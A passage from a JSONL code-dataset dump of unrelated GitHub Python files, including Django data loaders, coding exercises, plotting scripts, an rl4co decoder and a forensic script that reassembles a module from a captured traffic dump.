if item not in test:\r\n new_block = Block(name=item)\r\n new_block.save()\r\n test.add(item)\r\n added += 1\r\n print(' -> Added Block: {}'.format(item))\r\n print('->> Total added: {}'.format(added - len(prev)))\r\n\r\n\r\ndef add_projects():\r\n print('Populating Projects...')\r\n info = _parse_file(name=project_file, headers=False)\r\n keyval = project_file.split('.')[0]\r\n already = Project.objects.all()\r\n prev = [proj.name for proj in already]\r\n added = len(prev)\r\n test = set(prev)\r\n print('->> Total already in: {}'.format(added))\r\n for item in info[keyval]:\r\n if item not in test:\r\n new_proj = Project(name=item)\r\n new_proj.save()\r\n test.add(item)\r\n added += 1\r\n print(' -> Added Project: {}'.format(item))\r\n print('->> Total added: {}'.format(added - len(prev)))\r\n\r\n\r\ndef add_drawing_statuses():\r\n info = _parse_file(name=drawing_status_file, headers=False)\r\n keyval = drawing_status_file.split('.')[0]\r\n already = DrawingStatus.objects.all()\r\n prev = [dwg_st.status for dwg_st in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_dwg_status = DrawingStatus(status=item)\r\n new_dwg_status.save()\r\n added.append(item)\r\n print(' -> Added Dwg Status: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_departments():\r\n info = _parse_file(name=department_file, headers=False)\r\n keyval = department_file.split('.')[0]\r\n already = Department.objects.all()\r\n prev = [dep.name for dep in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_dep = Department(name=item)\r\n new_dep.save()\r\n added.append(item)\r\n print(' -> Added Department: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_disciplines():\r\n info = _parse_file(name=discipline_file, headers=False)\r\n keyval = discipline_file.split('.')[0]\r\n already = Discipline.objects.all()\r\n prev = [disc.name for disc in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_disc = Discipline(name=item)\r\n new_disc.save()\r\n added.append(item)\r\n print(' -> Added Discipline: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_drawing_kinds():\r\n info = _parse_file(name=drawing_kinds_file, headers=False)\r\n keyval = drawing_kinds_file.split('.')[0]\r\n already = DrawingKind.objects.all()\r\n prev = [dwg_kind.name for dwg_kind in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_dwg_kind = DrawingKind(name=item)\r\n new_dwg_kind.save()\r\n added.append(item)\r\n print(' -> Added Dwg Kind: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\ndef find_phases():\r\n print('finding phases in drawings.csv')\r\n info = _parse_file(name=drawing_file, headers=True)\r\n phases = set()\r\n for i in range(len(info[list(info.keys())[0]])):\r\n ph = info['phase'][i].lower()\r\n phases.add(ph)\r\n\r\n with open(os.path.join(location, 'phases.csv'), 'w') as pfile:\r\n for item in phases:\r\n print(item)\r\n pfile.write('{}\\n'.format(item))\r\n\r\n\r\ndef add_phases():\r\n print('Looking for phase file')\r\n if phase_file not in os.listdir(location):\r\n print('phase file not found...')\r\n find_phases()\r\n\r\n print('Populating Phases...')\r\n info = _parse_file(name=phase_file, headers=False)\r\n keyval = phase_file.split('.')[0]\r\n already = Phase.objects.all()\r\n prev = [phase.number for phase in already]\r\n added = prev[:]\r\n print('->> Total already in: {}'.format(len(added)))\r\n for item in info[keyval]:\r\n if item not in added:\r\n new_phase = Phase(number=item)\r\n new_phase.save()\r\n added.append(item)\r\n print(' -> Added Phase: {}'.format(item))\r\n print('->> Total added: {}'.format(len(added) - len(prev)))\r\n\r\n\r\ndef add_drawings():\r\n info = _parse_file(name=drawing_file, headers=True)\r\n print(' | '.join(['{}:{}'.format(key, val[0]) for key, val in info.items()]))\r\n\r\n total = len(info[[i for i in info.keys()][0]])\r\n \r\n added = 0\r\n for i in range(total):\r\n name = info['name'][i].lower()\r\n if not Drawing.objects.filter(name=name).exists():\r\n print('-> {}'.format(info['block'][i]), end='')\r\n if info['block'][i] == '0':\r\n info['block'][i] = 'misc'\r\n block = Block.objects.get(name=info['block'][i]) if info['block'][i] \\\r\n and info['block'][i] != '0'\\\r\n and info['block'][i] != 'none'\\\r\n else None\r\n status = DrawingStatus.objects.get(status='new')\r\n dep = Department.objects.get(name=info['department'][i]) if info['department'][i] else None\r\n disc = Discipline.objects.get(name=info['discipline'][i]) if info['discipline'][i] else None\r\n kind = DrawingKind.objects.get(name=info['kind'][i]) if info['kind'][i] else None\r\n phase = Phase.objects.get(number=info['phase'][i]) if info['phase'][i] else None\r\n if 'project' in info:\r\n proj = Project.objects.get(name=info['project'][i]) if info['project'][i] else None\r\n else:\r\n proj = Project.objects.get(name='cv3600')\r\n new_dwg = Drawing(name=name,\r\n desc=info['desc'][i] if info['desc'][i] else None,\r\n phase=phase,\r\n project=proj,\r\n #block=block,\r\n status=status,\r\n department=dep,\r\n discipline=disc,\r\n kind=kind,\r\n )\r\n new_dwg.save()\r\n new_dwg.block.add(block)\r\n new_dwg.save()\r\n added += 1\r\n print(' -> Added Drawing: {}'.format(name))\r\n\r\n print('->> Total Added: {}'.format(added))\r\n\r\n\r\ndef add_expected_dates():\r\n info = _parse_file(name=expected_dates_file, headers=True)\r\n current_tz = pytz.timezone(\"America/New_York\")\r\n for i in range(len(info['name'])):\r\n name = info['name'][i]\r\n if name:\r\n date = None\r\n exp_date = None\r\n if info['date'][i]:\r\n date = info['date'][i]\r\n exp_date = current_tz.localize(datetime.datetime.strptime(date, '%m/%d/%Y'), is_dst=None)\r\n \r\n\r\n if Drawing.objects.filter(name=name).exists(): \r\n d = Drawing.objects.get(name=name)\r\n d.expected = exp_date\r\n d.save()\r\n #update(expected=exp_date)\r\n print(' -> updated {} with date {}'.format(name, exp_date))\r\n \r\n\r\n\r\n","repo_name":"jaemk/drc","sub_path":"tracking/modelinfo/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":9867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13643742628","text":"import random as rd\n\nclass Car:\n def __init__(self) -> None:\n self.dist = 0\n self.fuel = 100\n print(\"부릉부릉~!\")\n\n def act(self):\n a = rd.randint(0, 4)\n if a == 0: self.go()\n elif a == 1: self.stop()\n elif a == 2: self.left()\n elif a == 3: self.right()\n elif a == 4: self.uturn()\n\n def go(self):\n self.fuel -= 15\n self.dist += 3\n print(\"드가자!!\")\n\n def stop(self):\n self.fuel -= 5\n self.dist += 1\n print(\"이건 좀...;;\")\n\n def left(self):\n self.fuel -= 10\n self.dist += 2\n print(\"왼\")\n\n def right(self):\n self.fuel -= 10\n self.dist += 2\n print(\"우\")\n\n def uturn(self):\n self.fuel -= 10\n self.dist += 2\n print(\"풀백!!!\")\n\n def checkFuel(self):\n return (self.fuel <= 0)\n \n\nmekaCar = Car()\n\nwhile True:\n if mekaCar.checkFuel():\n print(\"못달리뮤ㅠ\")\n print(f\"남은 연료: {mekaCar.fuel}\")\n print(f\"달린 거리: {mekaCar.dist}\")\n break\n \n mekaCar.act()","repo_name":"hki2345/KOPOAcademy","sub_path":"py_workstation/Practice_230623/carClass.py","file_name":"carClass.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23647661554","text":"print(\"You have \" + guesses + \" left.\")\nprint(\"Available letters: \" + get_available_letters(letters_guessed))\nans = input(\"Please guess a letter: \")\nif ans.isalpha():\n letters_guessed.append(ans.lower())\nelse:\n warnings -= 1\n if warnings == 0:\n guesses -= 1\n print(\"You have one less guess as you have inputed the wrong thing 3 times, guesses: \" + guesses)\n warnings = 3\n\n print(\"Oops! That is not a valid letter. You have \" + warnings + \" warnings left: \" + get_guessed_word(secret_word, letters_guessed))\nans = input(\"Please guess a letter: \")\nvalid = new_round()\n","repo_name":"ArthurAllilaire/MIT-6.0001-introduction-to-computer-science-assignments","sub_path":"ps2/Hangman scrap.py","file_name":"Hangman scrap.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27281025638","text":"\n# https://atcoder.jp/contests/abc140/tasks/abc140_e\n# https://atcoder.jp/contests/agc005/tasks/agc005_b\n# https://atcoder.jp/contests/abc157/tasks/abc157_e\n\n''' \n [Bit]\n'''\ndef modinv(a,m):\n b, u, v = m, 1, 0\n while b:\n t = a//b\n a -= t*b\n a,b = b,a\n u -= t * v\n u,v = v,u\n u %= m\n return u\n \n\nMOD=998244353\nclass Bit:\n \"\"\" used for only int(>=0) \n 0-indexed \n \"\"\"\n def __init__(self, n):\n self.size = n\n self.tree = [0] * (n + 1)\n self.depth = n.bit_length()\n \n def _sum(self, i):\n i+=1\n s = 0\n while i > 0:\n s += self.tree[i]\n if s>MOD:s-=MOD\n i -= i & -i\n return s\n\n def sum(self,l,r):\n return (self._sum(r-1)-self._sum(l-1))%MOD\n \n def add(self, i, x):\n i+=1\n while i <= self.size:\n self.tree[i] += x\n i += i & -i\n\n def lower_bound(self, x):\n \"\"\" 累積和がx以上になる最小のindexと、その直前までの累積和 \"\"\"\n sum_ = 0\n pos = 0\n for i in range(self.depth, -1, -1):\n k = pos + (1 << i)\n if k <= self.size and sum_ + self.tree[k] < x:\n sum_ += self.tree[k]\n pos += 1 << i\n return pos, sum_\n\n def get_less_than_x_cnt(self, x):\n \"\"\" 累積和がx未満 の個数 \"\"\"\n lb_pos, lb_sum = self.lower_bound(x)\n return lb_pos-1\n\n def get_less_than_and_x_cnt(self, x):\n \"\"\" 累積和がx以下 の個数 \"\"\"\n lb_pos, lb_sum = self.lower_bound(x+1)\n return lb_pos-1\n \n def get_more_than_x_cnt(self, x):\n \"\"\" 累積和がxより大きい 個数 \"\"\"\n return self.size - self.get_less_than_and_x_cnt(x)\n\n\n# if __name__ == \"__main__\":\n# bit=Bit(5)\n# bit.add(0,1)\n# bit.add(1,2)\n# bit.add(2,3)\n# bit.add(3,4)\n# bit.add(4,5)\n# print(bit.lower_bound(2))\n\ndef main():\n n=int(input())\n al=list(map(int, input().split()))\n ail=[(a,i) for i,a in enumerate(al)]\n ail.sort()\n bit=Bit(n+1)\n p2=[1]\n for i in range(n):\n p2.append((p2[-1]*2)%MOD)\n ans=0\n for a,i in ail:\n bit.add(i, p2[n-1-i])\n val=bit.sum(0,i)\n dist=n-i\n val*=modinv(p2[dist],MOD)\n ans+=val\n ans%=MOD\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nami4mo/competitive-programming","sub_path":"1_contest/current/abc221/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28138301909","text":"import sys\r\nfrom collections import defaultdict\r\n\r\ns, p = map(int, sys.stdin.readline().split())\r\ndna = sys.stdin.readline().rstrip()\r\ntmp = list(map(int, sys.stdin.readline().split()))\r\nchk = ['A', 'C', 'G', 'T']\r\nchk_count = defaultdict(int)\r\nfor i in range(4):\r\n chk_count[chk[i]] = tmp[i]\r\n# init\r\ncount = defaultdict(int)\r\nfor w in dna[:p]:\r\n count[w] += 1\r\nstart = 0\r\nanswer = 0\r\nwhile start <= len(dna) - p:\r\n # 체크 후\r\n if count['A'] >= chk_count['A'] and count['C'] >= chk_count['C'] and count['G'] >= chk_count['G'] and count['T'] >= chk_count['T']:\r\n answer += 1\r\n # 이동\r\n count[dna[start]] -= 1\r\n if start + p < s:\r\n count[dna[start+p]] += 1\r\n start += 1\r\n\r\nprint(answer)\r\n\r\n\r\n","repo_name":"ggramgyo/PS_STUDY","sub_path":"백준/Silver/12891. DNA 비밀번호/DNA 비밀번호.py","file_name":"DNA 비밀번호.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39613406130","text":"from turtle import color\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\n\ndf1 = pd.read_csv('cleaned1.csv')\n\nx = df1['Units Sold']\ny = df1['Total Profit']\nplt.subplot(1,2,1)\nplt.plot(x,color='r')\nplt.title(\"Unit Sold\")\n\nplt.subplot(1,2,2)\nplt.plot(y,color='b')\n#title for plot\nplt.title(\"total profit\")\n#over all title\nplt.suptitle(\"comparison of unit sold and profit\")\nplt.show()\n\n\na=df1['year']\nb=df1['Sales Channel']\nplt.bar(a,b,color=['r','b'])\nplt.suptitle(\"Sales Channel calculation over 2010-2017\")\nplt.show()\n\nb=df1['Order Priority']\nplt.suptitle(\"order priority\")\nplt.hist(b)\nplt.legend()\nplt.show()\n\na= df1['Item Type']\nplt.suptitle(\"Overall item count\")\nitem_count = Counter(a)\nb=item_count.values()\nc=item_count.keys()\nplt.bar(c,b)\nplt.show()\n\na=df1['year']\ncount=Counter(a)\nb=count.values()\nplt.suptitle(\"pie chart for years\")\ntes_lables=[2010,2011,2012,2013,2014,2015,2016,2017]\nplt.pie(b,labels=tes_lables)\nplt.show()\nplt.legend(title=\"year statistics\")\n\n","repo_name":"sneham10/M7_datapreprocessing","sub_path":"code/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22860973744","text":"def x(n):\n\n if n<10:\n\n list1=[]\n\n list1.append(n)\n\n return list1\n\n else:\n\n s=n%10\n\n n=n//10\n\n list1=list(x(n))\n\n list1.append(s)\n\n return list1\n\nprint(x(12345))","repo_name":"Sunqk5665/Python_projects","sub_path":"算法手册源代码/3/di02.py","file_name":"di02.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"29967448110","text":"from dataclasses import dataclass\nfrom typing import Tuple, Union\n\nimport torch\nimport torch.nn as nn\n\nfrom einops import rearrange\nfrom tensordict import TensorDict\nfrom torch import Tensor\n\nfrom rl4co.envs import RL4COEnvBase, get_env\nfrom rl4co.models.nn.attention import LogitAttention\nfrom rl4co.models.nn.env_embeddings import env_context_embedding, env_dynamic_embedding\nfrom rl4co.models.nn.utils import decode_probs\nfrom rl4co.utils.ops import batchify, get_num_starts, select_start_nodes, unbatchify\nfrom rl4co.utils.pylogger import get_pylogger\n\nlog = get_pylogger(__name__)\n\n\n@dataclass\nclass PrecomputedCache:\n node_embeddings: Tensor\n graph_context: Union[Tensor, float]\n glimpse_key: Tensor\n glimpse_val: Tensor\n logit_key: Tensor\n\n\nclass AutoregressiveDecoder(nn.Module):\n \"\"\"Auto-regressive decoder for constructing solutions for combinatorial optimization problems.\n Given the environment state and the embeddings, compute the logits and sample actions autoregressively until\n all the environments in the batch have reached a terminal state.\n We additionally include support for multi-starts as it is more efficient to do so in the decoder as we can\n natively perform the attention computation.\n\n Note:\n There are major differences between this decoding and most RL problems. The most important one is\n that reward is not defined for partial solutions, hence we have to wait for the environment to reach a terminal\n state before we can compute the reward with `env.get_reward()`.\n\n Warning:\n We suppose environments in the `done` state are still available for sampling. This is because in NCO we need to\n wait for all the environments to reach a terminal state before we can stop the decoding process. This is in\n contrast with the TorchRL framework (at the moment) where the `env.rollout` function automatically resets.\n You may follow tighter integration with TorchRL here: https://github.com/kaist-silab/rl4co/issues/72.\n\n Args:\n env_name: environment name to solve\n embedding_dim: Dimension of the embeddings\n num_heads: Number of heads for the attention\n use_graph_context: Whether to use the initial graph context to modify the query\n select_start_nodes_fn: Function to select the start nodes for multi-start decoding\n linear_bias: Whether to use a bias in the linear projection of the embeddings\n context_embedding: Module to compute the context embedding. If None, the default is used\n dynamic_embedding: Module to compute the dynamic embedding. If None, the default is used\n \"\"\"\n\n def __init__(\n self,\n env_name: [str, RL4COEnvBase],\n embedding_dim: int,\n num_heads: int,\n use_graph_context: bool = True,\n select_start_nodes_fn: callable = select_start_nodes,\n linear_bias: bool = False,\n context_embedding: nn.Module = None,\n dynamic_embedding: nn.Module = None,\n **logit_attn_kwargs,\n ):\n super().__init__()\n\n if isinstance(env_name, RL4COEnvBase):\n env_name = env_name.name\n self.env_name = env_name\n self.embedding_dim = embedding_dim\n self.num_heads = num_heads\n\n assert embedding_dim % num_heads == 0\n\n self.context_embedding = (\n env_context_embedding(self.env_name, {\"embedding_dim\": embedding_dim})\n if context_embedding is None\n else context_embedding\n )\n self.dynamic_embedding = (\n env_dynamic_embedding(self.env_name, {\"embedding_dim\": embedding_dim})\n if dynamic_embedding is None\n else dynamic_embedding\n )\n self.use_graph_context = use_graph_context\n\n # For each node we compute (glimpse key, glimpse value, logit key) so 3 * embedding_dim\n self.project_node_embeddings = nn.Linear(\n embedding_dim, 3 * embedding_dim, bias=linear_bias\n )\n self.project_fixed_context = nn.Linear(\n embedding_dim, embedding_dim, bias=linear_bias\n )\n\n # MHA\n self.logit_attention = LogitAttention(\n embedding_dim, num_heads, **logit_attn_kwargs\n )\n\n self.select_start_nodes_fn = select_start_nodes_fn\n\n def forward(\n self,\n td: TensorDict,\n embeddings: Tensor,\n env: Union[str, RL4COEnvBase] = None,\n decode_type: str = \"sampling\",\n num_starts: int = None,\n softmax_temp: float = None,\n calc_reward: bool = True,\n ) -> Tuple[Tensor, Tensor, TensorDict]:\n \"\"\"Forward pass of the decoder\n Given the environment state and the pre-computed embeddings, compute the logits and sample actions\n\n Args:\n td: Input TensorDict containing the environment state\n embeddings: Precomputed embeddings for the nodes\n env: Environment to use for decoding. If None, the environment is instantiated from `env_name`. Note that\n it is more efficient to pass an already instantiated environment each time for fine-grained control\n decode_type: Type of decoding to use. Can be one of:\n - \"sampling\": sample from the logits\n - \"greedy\": take the argmax of the logits\n - \"multistart_sampling\": sample as sampling, but with multi-start decoding\n - \"multistart_greedy\": sample as greedy, but with multi-start decoding\n num_starts: Number of multi-starts to use. If None, will be calculated from the action mask\n softmax_temp: Temperature for the softmax. If None, default softmax is used from the `LogitAttention` module\n calc_reward: Whether to calculate the reward for the decoded sequence\n\n Returns:\n outputs: Tensor of shape (batch_size, seq_len, num_nodes) containing the logits\n actions: Tensor of shape (batch_size, seq_len) containing the sampled actions\n td: TensorDict containing the environment state after decoding\n \"\"\"\n\n # Multi-start decoding. If num_starts is None, we use the number of actions in the action mask\n if \"multistart\" in decode_type:\n if num_starts is None:\n num_starts = get_num_starts(td)\n else:\n if num_starts is not None:\n if num_starts > 1:\n log.warn(\n f\"num_starts={num_starts} is ignored for decode_type={decode_type}\"\n )\n num_starts = 0\n\n # Compute keys, values for the glimpse and keys for the logits once as they can be reused in every step\n cached_embeds = self._precompute_cache(embeddings, td=td, num_starts=num_starts)\n\n # Collect outputs\n outputs = []\n actions = []\n\n # Instantiate environment if needed\n if isinstance(env, str):\n env_name = self.env_name if env is None else env\n env = get_env(env_name)\n\n # Multi-start decoding: first action is chosen by ad-hoc node selection\n if num_starts > 1 or \"multistart\" in decode_type:\n action = self.select_start_nodes_fn(td, env, num_nodes=num_starts)\n\n # Expand td to batch_size * num_starts\n td = batchify(td, num_starts)\n\n td.set(\"action\", action)\n td = env.step(td)[\"next\"]\n log_p = torch.zeros_like(\n td[\"action_mask\"], device=td.device\n ) # first log_p is 0, so p = log_p.exp() = 1\n\n outputs.append(log_p)\n actions.append(action)\n\n # Main decoding: loop until all sequences are done\n while not td[\"done\"].all():\n log_p, mask = self._get_log_p(cached_embeds, td, softmax_temp, num_starts)\n\n # Select the indices of the next nodes in the sequences, result (batch_size) long\n action = decode_probs(log_p.exp(), mask, decode_type=decode_type)\n\n td.set(\"action\", action)\n td = env.step(td)[\"next\"]\n\n # Collect output of step\n outputs.append(log_p)\n actions.append(action)\n\n outputs, actions = torch.stack(outputs, 1), torch.stack(actions, 1)\n if calc_reward:\n td.set(\"reward\", env.get_reward(td, actions))\n\n return outputs, actions, td\n\n def _precompute_cache(\n self, embeddings: Tensor, num_starts: int = 0, td: TensorDict = None\n ):\n \"\"\"Compute the cached embeddings for the attention\n\n Args:\n embeddings: Precomputed embeddings for the nodes\n num_starts: Number of multi-starts to use. If 0, no multi-start decoding is used\n td: TensorDict containing the environment state.\n This one is not used in this class. However, passing Tensordict can be useful in child classes.\n \"\"\"\n\n # The projection of the node embeddings for the attention is calculated once up front\n (\n glimpse_key_fixed,\n glimpse_val_fixed,\n logit_key_fixed,\n ) = self.project_node_embeddings(embeddings).chunk(3, dim=-1)\n\n # Optionally disable the graph context from the initial embedding as done in POMO\n if self.use_graph_context:\n graph_context = unbatchify(\n batchify(self.project_fixed_context(embeddings.mean(1)), num_starts),\n num_starts,\n )\n else:\n graph_context = 0\n\n # Organize in a dataclass for easy access\n cached_embeds = PrecomputedCache(\n node_embeddings=embeddings,\n graph_context=graph_context,\n glimpse_key=glimpse_key_fixed,\n glimpse_val=glimpse_val_fixed,\n logit_key=logit_key_fixed,\n )\n\n return cached_embeds\n\n def _get_log_p(\n self,\n cached: PrecomputedCache,\n td: TensorDict,\n softmax_temp: float = None,\n num_starts: int = 0,\n ):\n \"\"\"Compute the log probabilities of the next actions given the current state\n\n Args:\n cache: Precomputed embeddings\n td: TensorDict with the current environment state\n softmax_temp: Temperature for the softmax\n num_starts: Number of starts for the multi-start decoding\n \"\"\"\n # Unbatchify to [batch_size, num_starts, ...]. Has no effect if num_starts = 0\n td_unbatch = unbatchify(td, num_starts)\n\n step_context = self.context_embedding(cached.node_embeddings, td_unbatch)\n glimpse_q = step_context + cached.graph_context\n glimpse_q = glimpse_q.unsqueeze(1) if glimpse_q.ndim == 2 else glimpse_q\n\n # Compute keys and values for the nodes\n (\n glimpse_key_dynamic,\n glimpse_val_dynamic,\n logit_key_dynamic,\n ) = self.dynamic_embedding(td_unbatch)\n glimpse_k = cached.glimpse_key + glimpse_key_dynamic\n glimpse_v = cached.glimpse_val + glimpse_val_dynamic\n logit_k = cached.logit_key + logit_key_dynamic\n\n # Get the mask\n mask = ~td_unbatch[\"action_mask\"]\n\n # Compute logits\n log_p = self.logit_attention(\n glimpse_q, glimpse_k, glimpse_v, logit_k, mask, softmax_temp\n )\n\n # Now we need to reshape the logits and log_p to [batch_size*num_starts, num_nodes]\n # Note that rearranging order is important here\n log_p = rearrange(log_p, \"b s l -> (s b) l\") if num_starts > 1 else log_p\n mask = rearrange(mask, \"b s l -> (s b) l\") if num_starts > 1 else mask\n return log_p, mask\n","repo_name":"kaist-silab/rl4co","sub_path":"rl4co/models/zoo/common/autoregressive/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":11609,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"31"} +{"seq_id":"73943580887","text":"#coding=utf-8\nimport sys\nimport re\nimport urllib\n\n#reload(sys)\n#sys.setdefaultencoding('gbk')\n\ndef getHtml(url):\n page = urllib.urlopen(url)\n mybytes = page.read()\n html = mybytes.decode(\"utf8\")\n page.close()\n return html\n\ndef getWeather(html):\n reg = r'(.*?).*?'\n reg += r'(.*?).*?(.*?)'\n weatherList = re.compile(reg).findall(html)\n return weatherList;\n\nweatherList = getWeather(getHtml(r\"http://www.weather.com.cn/shanghai/index.shtml\"))\nfor weather in weatherList :\n print(\"{0} Night:{1} / Day:{2} {3}/{4}\".format(weather[0], weather[1], weather[2], weather[3], weather[4]))\n","repo_name":"jiguang123/Python-Spider-Action","sub_path":"GetWeather.py","file_name":"GetWeather.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12157894232","text":"from ListLink import ListLink, ListNode\nclass Solution:\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n tmp = ListNode('#')\n tmp.next = head\n p1, p2 = tmp, head\n while p2 and p2.val < x:p1, p2 = p2, p2.next\n p3, p4 = p2, p2.next\n while p4:\n if p4.val < x:\n p1.next, p3.next = p4, p4.next\n p4.next, p1, p4 = p2, p4, p3.next\n else:\n p3, p4 = p4, p4.next\n return tmp.next\n\nprint(Solution().partition(ListLink([2, 1]).head, 2))","repo_name":"mavis0/LeetCode","sub_path":"Partition List.py","file_name":"Partition List.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6608695832","text":"from django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render,redirect,reverse\nimport string, random\nimport unidecode\nimport os\n\nclass Utility:\n @classmethod\n def get_random_string(cls,length=15):\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n \n @classmethod\n def url_stringify(cls,string_pattern,sep=\"-\"):\n \"\"\"Function who take a string and transform it to url \n String by removing all special character, remove all space,\n and replace thems by a -\"\"\"\n final_str=unidecode.unidecode(string_pattern)\n final_str=final_str.strip()\n final_str=final_str.replace('\\s+',' ')\n final_str=final_str.replace(\" \",sep)\n #print(final_str)\n #print(string_pattern)\n return final_str\n \n @classmethod\n def remove_accent(cls,chre):\n \"\"\"remove all accent characters from a chre string\"\"\"\n return unidecode.unidecode(chre)\n \n @classmethod\n def is_null_or_empty(cls,chaine,null_function=''):\n \"\"\"Function who find is value is null or empty. white space are removed\n you can pass your own function who test is value is null with param\n @null_function, for example null_function=is_none \"\"\"\n if(null_function==''):\n if chaine is None:\n return True\n else:\n if(null_function(chaine)):\n return True\n try:\n if(chaine.strip()==\"\"):\n return True\n except Exception as e:\n return False\n\n \n\n","repo_name":"apachefranklin/face-recognition","sub_path":"recognition/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34863387817","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# This script extracts malicious RDP module from the traffic\n\nimport re, struct, zlib\n\nFILENAME = 'traffic/kernel_traffic_dump.bin'\nOUT_FILENAME = 'traffic/rd_restored.bin'\nFILTER = rb'\\x42\\x49\\x4E\\x53'\nHEADER_SZ = 16\n\ndef get_hash(pp: bytes) -> int:\n hash = 0\n for i in range(len(pp)):\n hash += pp[i]\n return hash\n\nstream = b''\nwith open(FILENAME, 'rb') as f:\n stream = f.read()\n\nmatches = re.search(FILTER, stream)\noffset = matches.start()\n\nexcepted_hash = None\nexcepted_sz = None\ntotal_hash = 0\nconstructed_rd = b''\nwhile offset < len(stream):\n magic, pkt_sz, payload_sz, pkt_type = struct.unpack(b' 10:\n command, total_sz, curr_sz = struct.unpack(b' bool:\n \"\"\"\n\n Returns:\n bool. True if the row that the condition is evaluated to True should be excluded\n from the result.\n \"\"\"\n return not self.is_inclusive\n\n @classmethod\n def good(cls, should_terminate: bool,\n is_inclusive: bool) -> 'TableEndConditionResult':\n \"\"\"Good TableEndConditionResult\n\n Args:\n should_terminate (bool):\n is_inclusive (bool):\n\n Returns:\n TableEndConditionResult\n \"\"\"\n return TableEndConditionResult(\n should_terminate=should_terminate,\n is_inclusive=is_inclusive,\n is_ok=True\n )\n\n @classmethod\n def bad(\n cls,\n msg: str = '',\n exception: Optional[Exception] = None) -> 'TableEndConditionResult':\n \"\"\"Bad TableEndConditionResult\n\n Args:\n msg (str):\n exception ():\n\n Returns:\n TableEndConditionResult\n \"\"\"\n return TableEndConditionResult(\n should_terminate=True,\n is_inclusive=False,\n is_ok=False,\n msg=msg,\n exception=exception\n )\n","repo_name":"thegangtechnology/exco","sub_path":"src/exco/extractor/table_end_conditions/table_end_condition_result.py","file_name":"table_end_condition_result.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"25812048915","text":"# -*- coding: utf-8 -*-\n''' Graphics of the finite element model.\n'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. Pérez Tato (LCPT) , Ana Ortega (AO_O) \"\n__copyright__= \"Copyright 2016, LCPT, AO_O\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@ciccp.es, ana.ortega@ciccp.es \"\n\nimport sys\nimport vtk\nfrom misc_utils import log_messages as lmsg\nimport xc_base\nfrom misc.vtk_utils import utils_vtk\nfrom postprocess.xcVtk import vtk_graphic_base\nfrom postprocess.xcVtk.fields import fields\nfrom postprocess.xcVtk.fields import local_axes_vector_field as lavf\nfrom postprocess.xcVtk.CAD_model import create_array_set_data\nimport random as rd \nimport xc\n\nclass DisplaySettingsFE(vtk_graphic_base.DisplaySettings):\n ''' Define the parameters to configure the output for\n displaying the finite element mesh.\n '''\n def __init__(self):\n super(DisplaySettingsFE,self).__init__()\n self.nodes= None\n self.gridMapper= None\n \n def VtkDefineElementsActor(self, reprType, field: fields.ScalarField,color=xc.Vector([rd.random(),rd.random(),rd.random()])):\n ''' Define the actor to display elements\n\n :param reprType: type of representation (\"points\", \"wireframe\" or\n \"surface\")\n :param field: scalar field to be represented.\n :param color: RGB color to represent the elements (defaults to random\n color)\n '''\n if(field):\n 